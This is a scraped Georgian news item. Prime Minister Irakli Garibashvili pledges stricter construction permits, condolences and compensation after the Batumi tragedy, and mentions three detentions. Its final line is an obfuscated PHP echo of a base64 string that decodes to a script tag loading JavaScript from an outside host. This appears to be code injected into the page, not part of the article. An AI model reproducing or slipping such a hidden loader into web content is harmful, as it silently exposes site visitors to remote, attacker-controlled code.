celsiusi
ავერსი შნაიდერი
პრემიერ-მინისტრის ირაკლი ღარიბაშვილის განცხადებით, სამშენებლო რეგულაციები უფრო მეტად უნდა გამკაცრდეს, ნებართვის გაცემის პროცედურები მკაცრად გაკონტროლდეს, რადგან ბათუმის მსგავსი პრეცედენტები არ განმეორდეს. 
 
"ვგეგმავთ, რომ კიდევ უფრო მეტად გავამკაცროთ რეგულაციები. ნებართვის გაცემის პროცედურები უნდა გაკონტროლდეს მკაცრად და ასეთი შეცდომა მეორედ აღარ უნდა იყოს დაშვებული", - აღნიშნა ირაკლი ღარიბაშვილმა. 
 
პრემიერი ბათუმში მომხდარ ტრაგედიას კიდევ ერთხელ გამოეხმაურა და გარდაცვლილების ოჯახის წევრებს მიუსამძიმრა. 
 
მისი თქმით, თავრობა ამ ოჯახებს მაქსიმალურად დაუდგება გვერდში. 
 
"მინდა კიდევ ერთხელ მივუსამძიმრო ოჯახებს, ვინც დაკარგეს ოჯახის წევრები და მართლაც დიდი ტრაგედიაა ჩვენთვის ყველასთვის. აჭარის მთავრობამ ყველაფერი გააკეთა და ჩვენ, ცენტრალური ხელისუფლება მაქსიმალურად გვერდში დავუდგებით იმისთვის, რომ მაქსიმალურად დროულად ყველას გადაეცეს საცხოვრებელი ბინები საკუთრებაში და ამას გარდა, ფულადი კომპენსაციები იმისთვის, რომ შესაბამისი პირობები მოაწყონ საკუთარ სახლებში.
 
მოგეხსენებათ, რომ პოლიციამ უკვე დააკავა 3 პირი, რომელიც იკვეთება ამ დანაშაულში, ამ უბედურ შემთხვევაში, ტრაგედიაში, დავარქვათ ამას გულგრილობა, თუ გაუფრთხილებლობა, ამას, ბუნებრივია, გამოძიება გასცემს პასუხს, მაგრამ ჩვენ, მთავრობა, ყველაფერს გავაკეთებთ იმისთვის, რომ ამ ოჯახებს მაქსიმალურად გვერდში დავუდგეთ“, -  განაცხადა პრემიერ-მინისტრმა.
1018
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");